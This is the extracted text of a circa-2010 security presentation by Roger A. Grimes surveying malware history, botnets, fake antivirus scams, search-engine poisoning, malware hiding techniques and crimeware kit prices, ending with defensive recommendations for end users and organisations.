2. Presenter BIO
Roger A. Grimes
CPA, CISSP, CEH, CISA, TICSA, MCSE: Security, yada, yada
InfoWorld Contributing Editor, Security Columnist, Product
Reviewer, and Blogger
23-year Windows security consultant, instructor, and author
Author of seven books on computer security, including:
Windows Vista Security: Security Vista Against
Malicious Attacks (Wiley, 2007)
Professional Windows Desktop and Server Hardening
(Dec. 2005)
Malicious Mobile Code: Virus Protection for Windows
(O’Reilly, 2001)
Honeypots for Windows (Apress, December 2004)
Author of over 300 national magazine articles on computer
security
Principal Security Architect for Microsoft InfoSec ACE Team
4. Presentation Summary
Quick History of Past Malware Threats
Today's Threats
Anatomy of Today's Cyber Attack
Malware Examples
Best Defenses
5. Malware Has Been Around Since The Beginning of
Computers
Most early malware were network worms
Late 1960’s – John Conway’s Game of LifeCore Wars
Imp
1971, Creeper worm was written by Bob Thomas of the
BBN (Bulletin Board Network)
(First PC, Altair 8800, 1974)
IBM Christmas worm –Dec. 1987
Robert Morris Worm –Nov. 1988
Historic Malware Trends
6. (Apple computer invented 1976)
1982 - Richard Skrenta, Jr. a 9th grade high school
student, a Core War fan, wrote a 400-line Apple II boot
virus, called Elk Cloner
Spread around the world
Every 50th boot would present message
No virus scanners or cleaners at this time
(IBM PC introduced in late 1981)
1986 – Pakistani Brain – first IBM-compatible virus
1987 – Stoned, Jerusalem, Cascade (encrypted), Lehigh
Historic Malware Trends
First PC Viruses – Boot Viruses
7. Boot Viruses
Even though they made up just a few percent of the
malware programs, they accounted for most of the
infections
March 1992 – Michelangelo
Executable Viruses
Some Trojan Horse Programs
Some Worms, but not many
Most malware programs were not intentionally
malicious
Historic Malware Trends
Early PC Malware
8. 1985 – Macro viruses
1998 – HTML viruses
2001 – Code Red – IIS worm
2003 – SQL Slammer
Fastest exploit to date – 10 minutes to infect world
2003 – MS Blaster
In 99.9999% of cases, patch was available before exploit
was released
Historic Malware Trends
PC Malware Hits Mainstream
9. From 1999 to late 2006, about 90% of malware attacks
arrived via email
VBScript, Javascript
Malicious file attachments
Rogue embedded links
Spam
MIME-type mismatches
Social-engineering methods
Melissa, I love you worm
Historic Malware Trends
Email wormsviruses
10. Still, most were not intentionally malicious
Those were the days!
Historic Malware Trends
Email wormsviruses
11. Run an up-to-date antivirus program
Run a host-based firewall that prevents
unauthorized outbound connections
Be fully patched
Visit only trusted web sites
Careful opening unexpected documents
Use other programs and OSs to remain safe
Current Malware Trends
Conventional Defense Wisdom
12. AV is not all that accurate and cannot be relied
upon
Host-based firewalls really don’t work most of
the time
Nobody fully patches
Trusted web sites are how you get infected
Many attacks work cross-platform or don’t care
about OS or app
Targeted spearphishing makes determining what
documents you should open hard to do
Current Malware Trends
Sadly...
13. Malware and hacking is worst than ever!
Even though we already do all the recommended
stuff
Current Malware Trends
Sadly...
14. Mostly trojans, worms, and downloaders
Professionally written
Development forks, teams
Criminally-motivated
Bots & botnets
Tens of millions of PCs “owned” at any one time
Designed To Get Money
Steal passwords, identity info, DDoS attacks
Mostly asks for permission to run and user responds
“YES”
Current Malware Landscape
New Malware Model
15. Cybercriminals are stealing tens of millions (at
least) of dollars every day
2009 Verizon Data Breach report found that 91
percent of all compromised records in 2008 was
attributed to organized criminal activity.
Current Malware Landscape
Criminally Motivated
16. Cybercriminals are stealing tens of millions (at
least) of dollars every day
2009 Verizon Data Breach report found that 91
percent of all compromised records in 2008 was
attributed to organized criminal activity.
“On the brighter side, we are happy to report that these
efforts with law enforcement led to arrests in at least 15
cases.”
Current Malware Landscape
Criminally Motivated
17. 1. User visits “innocent” infected web site
2. Contains simple Javascript redirector
3. Prompts user to install fake program
Anti-virus scanner, patch, codec, malformed PDF, etc.
4. First program is a small downloader
Starts the malware process
Provides bot control
Dials home for more instructions
Current Malware Landscape
Most Common Malware Cycle
19. What has trusted ever meant anyway?
How do I know I can trust it?
Do those “seals of approval” mean anything?
Current Malware Landscape
Trusted Web Sites?
20. What has trusted ever meant anyway?
How do I know I can trust it?
Do those “seals of approval” mean anything?
Me, I feel safer on a pay-for-view porn site!!
Current Malware Landscape
Trusted Web Sites?
21. 77 percent of web sites with malicious code are
legitimate sites that have been compromised
61 percent of the top 100 sites either hosted
malicious content or contained a masked redirect to
lure unsuspecting victims to malicious
37 percent of malicious Web/HTTP attacks included
data-stealing code
57 percent of data-stealing attacks are conducted over
the Web
Current Malware Landscape
Innocently Infected Web Sites
22. How?
Web site itself compromised
Misconfiguration
Vulnerability
Allows user postings
Malicious ads from legitimate ad services
Malicious sponsored ads on search engines
Poisoned search engine results
Web site codelets created by bad guys to go
malicious one day
Current Malware Landscape
Innocently Infected Web Sites
23. Tens of Millions of Malicious Web Sites
Look real, but completely malicious
Often taken there by OS or app help program or
search engine
Promote product that is nothing but malicious
Have entire teams of people dedicated to promoting
product on “independent” blogs, review magazines,
etc.
Ex: You must have this codec to watch these car
racing videos on YouTube
Current Malware Landscape
Some aren’t so Innocent!
24. Poisoned Ad Services
You name the major web site and it has probably
hosted malicious ads
Ads posted by web site owner, marketing firm hired
by web site, compromised ad service, or hacking
Avast - the most compromised services are Yahoo’s
yieldmanager.com and Fox’s fimserve.com
Responsible for more than 50% of poisoned ads
Doubleclick.net too
http://blog.avast.com/2010/02/18/ads-poisoning-
%e2%80%93-jsprontexi/
Current Malware Landscape
Innocently Infected Web Sites
25. Poisoned Cartoons?
King Features, a newspaper comic distributor was
hacked
King Feature distributes online comics to about 50
different newspapers
Online readers were prompted to download a
malicious PDF
http://voices.washingtonpost.com/securityfix/2009/
12/hackers_exploit_adobe_reader_f.html
Current Malware Landscape
Innocently Infected Web Sites
26. Search Engine Poisoning
Bad guys create web sites that are very attractive to search
engine bot crawlers (e.g. lots of links with lots of
keywords)
It is not uncommon to find malicious links in 15% to 20%
of the first 100 results from a search
Some of the most popular searches will return 90%
Malicious web sites are generated are often generated on
the fly, changed only by a single keyword in the URL
http://www.cyveillanceblog.com/general-
cyberintel/malware-google-search-results
Current Malware Landscape
Innocently Infected Web Sites
27. SEO Kits
Poisoned search engine results often created by Search
Engine Optimization (SEO) kits
Kits download must popular search engine requests from
the search engines themselves (e.g. googletrends)
Then generate web site on the fly with those keywords
and images
Generates thousands of web sites with those keywords
and link to each other
http://www.sophos.com/sophos/docs/eng/papers/sopho
s-seo-insights.pdf
Current Malware Landscape
Innocently Infected Web Sites
28. Sponsored Ads
Search engines often host sponsored ads that redirect to
malicious sites and code
Nearly all search engines involved
Certainly the ones you use are
Due to malware companies posing as legitimate
companies and switching up ads or legitimate web sites
being infected that paid for legitimate ad time
Current Malware Landscape
Innocently Infected Web Sites
30. Many Infected Host Providers Are Slow To
Respond
Example: ThePlanet.com
Stopbadware.org notifies ThePlanet when they note
an infected web site hosted by ThePlanet
Averages 12K-20K infected sites a month
1 month after reporting, 12K of reported web sites
remain infected
4.5K remain infected after 7 months
Current Malware Landscape
Innocently Infected Web Sites
31. Bulletproof Hosting
Many companies advertise on the promise that they
will keep your web site up no matter what you do
with it
The Russian Business Network is number one in this
space
McColo was #2 before 2008 takedown
Plenty of competition
Located in countries without appropriate laws
Current Malware Landscape
Not-So Innocently Infected Web Sites
34. `
Dynamic DNS Server
Initial Mothership
Web Server
Dynamic Mothership
1. Bot program exploits
victim PC and installs
itself
2. It “phones home”
using dynamic DNS
server to find
“mothership”
3. Finds mothership,
downloads new code and
instructions
4. Repeats 1-20 times
5. Infects new victim PCs
6. Sometimes plays role
of bot host, sometimes of
dynamic DNS server,
sometimes mothership
-Created for just this single
victim instance
-Can be a legitimate DNS
server or exploited system
-Usually just another
exploited victim or web
server
-Updates dynamic DNS
server with current IP
address
-Mothership updates may
cycle 20 times
-Sends bot host new
programs, new payload, new
instructions
Current Malware Landscape
New Malware Model Steps
35. 1. Infect or Exploit
2. Modify system to gain control
3. Phone “home” to get code update
Repeat this step 1-20 times
4. Modify host and spread to create bot net
5. Steal information-financial, passwords, etc.
6. Able to bypass any authentication method
7. When finished, self-delete, cover up tracks
Current Malware Landscape
New Malware Model Steps
36. Self-healing bot nets
Intended to live only a few hours
Auto-updating
Design To Hide
Millions of malicious links on social networking
sites
Some of the biggest users of Facebook, Myspace, and
Twitter
Current Malware Landscape
New Malware Model (con’t)
37. Silent Drive-by-Downloads and one-click and your
owned traps used to be the way people got infected
Require unpatched software and vulnerabilities
UAC and other browser protections make this harder to
do
Still happens, but now in the minority
OS patching is nearly 100% now
App patching could be better
Malware writers are mostly targeting unpatched
Internet browser apps now
Current Malware Landscape
New Malware Model (con’t)
38. In most cases, people are tricked into intentionally
installing a malware program
99% of the risk in most environments
Occasionally, a roving worm, like Conficker, becomes Ms.
Popularity for a few days or months
Current Malware Landscape
New Malware Model (con’t)
39. Vuls. trending down since 1H 2007
Current Malware Landscape
Known Vulnerabilities Going Down Year-after-Year
Figures for all reporting vendors
40. Even OS and Browser Vulnerabilities Are Flat
Current Malware Landscape
Known Vulnerabilities Going Down Year-after-Year
From MS SIR 8
41. Especially in the browser space
Every new browser vendor promises to make the
perfectly secure browser that apparently Microsoft
cannot seem to make
Later on I’ll tell you how it doesn’t matter at all
anyway
Current Malware Landscape
Still Plenty of Vulnerabilities
42. Firefox – 169
Apple Safari – 94
Internet Explorer – 45
Google Chrome – 41
Opera - 25
Current Malware Landscape
Number of Browser Vulnerabilities in 2009
From SymantecSecunia
43. Firefox – 52
3.0-15, 3.5-18, 3.6-19
Apple Safari 4– 17
Internet Explorer 8 – 21
Google Chrome – 28
Opera – 6
Of all browsers Symantec analyzed in 2009, Safari had the longest window
of exposure (the time between the release of exploit code for a
vulnerability and a vendor releasing a patch), with a 13-day average; IE, FF,
and Opera had the shortest windows of exposure, avg 1 day.
Current Malware Landscape
Number of Browser Vulnerabilities in 2010 (so far)
44. The way almost all your users are getting
infected is direct action trojans
Current Malware Landscape
But Vulns Don’t Matter All That Much
45. By a huge percentage, trojans are number one!
Current Malware Landscape
Trojans Are #1!
(From Microsoft SIR 8)
Exploits
Trojans
Trojans
47. Trojan program looks “really, really” authentic
Coming from legitimate web sites, spam, phishing
attacks
Bad guy often buys ads on search engines or “poisons”
search engine results
Certain keywords are more likely to bring up malware
than legitimate web sites
Bad guys use the latest news (e.g. earthquake, celebrity
event, etc.)
Often accidentally redirected to malware sites by
legitimate trusted software
Why Are They So Prevalent?
49. In one year, Google found over 11,000 web sites
offering fake AV scanners
1,462 unique new installer programs per day
20% detection rate by real AV
1 hr – median time redirection web site is up before
hackers move on
In SIR 8, Microsoft said its security products cleaned
fake anti-virus related malware from 7.8 million
computers in the second half of 2009.
Fake AV Stats – from Google
51. Millions of new programs created every year
Challenging for pure definition scanners to keep up
No antivirus scanner will ever be perfect
Check out http://www.virustotal.com/estadisticas.html
Why Are They So Prevalent?
52. “Zero-day” exploits becoming more common
One attack program can have 20 exploit vectors
DNS tricks
Poisoning, hosts file manipulation
Sound-alikes
One-offs (everything unique for each victim)
Millions of malware programs each year
Symantec reported 2.8 M malware programs in 09
More than legitimate programs
Current Malware Landscape
Infection or Exploit
53. Known Malware Detection Rates Not Bad
www.virusbulletin.com
Dozens of AV scanners routinely detect 100% of the
known malware programs in the wild with zero false-
positives
Awarded VB100
Why Are They So Prevalent?
Malware Is Hiding Better
54. First-Day Malware Detection Rates Could Be Improved
www.av-test.org (Dec. 2009)
Brand new threats were released and tested
Best products detected malware 98% of the time, blocked
95% of the time
Average product was 70-90% effective
Sounds good until you realize that out of 100 users in
your network, at least two of them will be presented with
a trojan program that is not detected as malicious
Now multiple that by the size of your user base, especially
over time
Why Are They So Prevalent?
Malware Is Hiding Better
55. How Does Malware Hide?
Early Techniques:
Encrypted – hide the malware so it can’t be scanned
Oligomorphic- multi. encryption/decryption engines
Polymorphic- random encryption/decryption
Metamorphic- mutates malware body, looks for compiler
on host and re-compiles malware on-the-fly
Why Are They So Prevalent?
Malware Is Hiding Better
56. How Does Malware Hide?
Today’s Techniques:
HTML Encoding/Obfuscation
Character set (e.g. UTF-8, UTF-7, Unicode) encoding
Compression (e.g. multi-compressed zip files)
Packers, Multi-packers
SSL/TLS/encryption for travel and communications
Why Are They So Prevalent?
New Malware Is Hiding Even Better
57. How Does Malware Hide?
Today’s Techniques:
Language encoding (e.g. simplified Chinese)
Transfer encoding (e.g. chunked, token-extension)
Packet fragmentation, time-outs
Password protected files
Embedded code (e.g. RTF links)
Embedded in thick content (e.g. PDF, Flash, MS-Office
objects)
Why Are They So Prevalent?
New Malware Is Hiding Even Better
58. How Does Malware Hide?
Today’s Techniques:
Dynamic DNS names
Dynamic IP addressing
One-time URLs (unique per victim)
Self-deleting malware
Delete and come back when needed
Why Are They So Prevalent?
New Malware Is Hiding Even Better
59. Responsible for up to nearly 50% of all successful
web-based attacks.
Current Malware Landscape
Adobe Acrobat Malware Is a Huge Problem
60. Responsible for up to nearly 50% of all successful
web-based attacks.
Current Malware Landscape
Adobe Acrobat Malware Is a Huge Problem
61. Usually arrives in email
Sender has internal details
Most captured from company’s public web site and news
Other times, obviously has insider knowledge of project
or detal
Often target senior executives
Project document, pending lawsuit, child support inc.
Common scam: Target accounting to infect the payroll
transfer transaction computer
Defense: That computer should not be connected to the
normal network or used for anything else, highly guarded
and secured
Current Malware Landscape
Targeted Spearphishing
62. Can arrive in email
Current Malware Landscape
Adobe Acrobat Malware Example
63. Prompts User to Save Another “PDF” file
Current Malware Landscape
Adobe Acrobat Malware Example
64. Can be prevented by modifying one setting
Current Malware Landscape
Adobe Acrobat Malware Example
65. Most attacks several years old.
Current Malware Landscape
Do You Patch Office?
66. More than half (56.2 percent) of the attacks affected
Office program installations that had not been
updated since 2003.
Most of these attacks involved Office 2003 users who
had not applied a single service pack or other
security update since the original release of Office
2003 in October 2003.
Current Malware Landscape
Do You Patch Office?
67. CAN-SPAM Act of 2003 took down spam!
Current Malware Landscape
68. 25% - Percentage of spam when CAN-SPAM Act was
passed
Current Malware Landscape
Spam stats
69. Spam is most of our email
88% according to Symantec
93% according to MessageLabs
95 percent of user-generated comments to blogs, chat
rooms and message boards are spam or malicious.
(Websense 2009 report)
Spearphishing for targeted attacks increasing greatly
85% of spam is sent by bots from innocently infected
computers (Symantec)
20% of all spam sent in March 2010 used TLS
(MessageLabs)
Current Malware Landscape
Spam stats
70. Spammers bypass CAPTCHAs, by:
OCR – recognize the symbols
VCR – recognize the voice
Paying third world country employees to manually
answer
Freelancer.com - dozens of such projects are bid on
every week.
80 cents to $1.20 for each 1,000 deciphered boxes or
about $6 every 15 days for the average worker
Current Malware Landscape
Spammers Still Abusing Free Web Mail
71. Per MessageLabs
Hundreds of billions of spams are sent each day
85% from spambots, 90% from the top five bots
Rustock – largest current botnet with 2.4M hosts,
responsible for 1/3rd of all spam
Grum- Responsible for 24% of all spam
Mega-D – Responsible for 18% of all spam
Top spam bots vary according to measurer, but Rustock
always gets #1 spot
Current Malware Landscape
Bot Nets and Spam
73. Many commercial bot net kits
Management interfaces
24 x 7 tech support
Bypass any authentication
Made to order
Example: ButterflyMariposa bot net (March 2010)
13 million controlled computers in 190 countries
Run by three non-experts, required very little skill
Bought original bot kit for $300
Current Malware Landscape
Bot Nets
74. Crum - $200 – Creates polymorphic encrypted
malware, free updates
Eleonore Exploits Pack –$700 – several exploits
including MS, Firefox, Opera, and PDF
Neon – $500- PDFs (including FoxIt), Flash, Snapshot
Adrenaline- $3000- keylogging, theft of digital
certificates, encryption of information, anti-detection
techniques, cleaning of fingerprints, injection of viral
code, etc.
http://malwareint.blogspot.com/2009/08/prices-of-
russian-crimeware-part-2.html
Current Malware Landscape
Malware Kit Examples
76. For the most part, we aren’t catching many of the criminals
International jurisdictions, non-compliant countries, no hard
evidence, real crimefighting takes time
Users/admins not doing the simple things they should be
doing to stop malicious attacks
Attackers don’t need complex, hypervisor attacks to do
damage; current attacks doing just fine
Vendors could produce zero-defect software and it would
not make a measurable dent in cybercrime
Current Malware Landscape
Future Not Looking That Great
77. The most popular software in a particular
category will be successfully attacked the most
Grimes Corollary
78. The most popular software in a particular
category will be successfully attacked the most
Grimes Corollary
Regardless of whether or not Microsoft made it!
Windows, IE, Microsoft Office
PDF over XPS
Apache over IIS
Quicktime over Windows Media Player
ActiveX over Java Applets
79. AuctionSales Site scams
Selling a car or motorcycle for an unbelievable
price with unbelievable terms
“I’ll give you the best price ever and pay for
international shipping”
Send your money to a “trusted, third party”
“Buyer protection”
Doesn’t care what your OS or browser is
So much for your anti-malware programs
Current Malware Landscape
Many Times No Malware Needed
80. Auction Car Sale Scam Example
Current Malware Landscape
Many Times No Malware Needed
81. Auction Car Sale Example
Current Malware Landscape
Many Times No Malware Needed
82. Lessons To Take Away
Malware usually comes from innocently infected web sites
Visiting only “trusted” web sites is not great advice anymore
Consider investing more in technologies that can mitigate
these types of threats
Educate end users about the current state of malware
**If we could educate users to not install fake programs, the
majority of the current malware threat would disappear
overnight
Current Malware Landscape
Forming a Defense
83. Best End-User Defenses
Don’t be logged in as Administrator or root when
surfing the web or reading email
Run up-to-date anti-malware programs
Antivirus, Firewalls, Anti-spam, Anti-phishing, intrusion
detection
Fully patch OS and all applications, including
browser add-ons (harder than it sounds)
Use good, secure defaults
Fight the Good Fight
84. Best End-User Defenses
Educate end-users to most likely threats
Tell them to learn what their AV software looks like
and what it doesn’t
Show them what their patching software looks like
Tell them not to install software offered by their
favorite web site
Does your educational content contain this
information?
Phish your own users (be the first!)
Fight the Good Fight
85. Best End-User Defenses
Use search engines that contain anti-malware
abilities (e.g. Bing, Google, etc.)
Use browsers that have anti-malware checkers
Most of the popular ones, but not all
Look for unusual network traffic patterns
Unexpected large transfers, workstation-to-workstation,
server-to server
Install honeypots as early warning detectors
Fight the Good Fight
86. Future Defenses
Most countries are starting to work together better
(although very slowly)
Ultimately will take rebuilding the Internet
Building in pervasive identity and accountability
Still support anonymity
Will have to be done incrementally
Support End-t0-End Trust initiatives
All needed protocols are already in place
See Trusted Computing Group’s work
Microsoft’s End To End Trust
Current Malware Landscape
Forming a Defense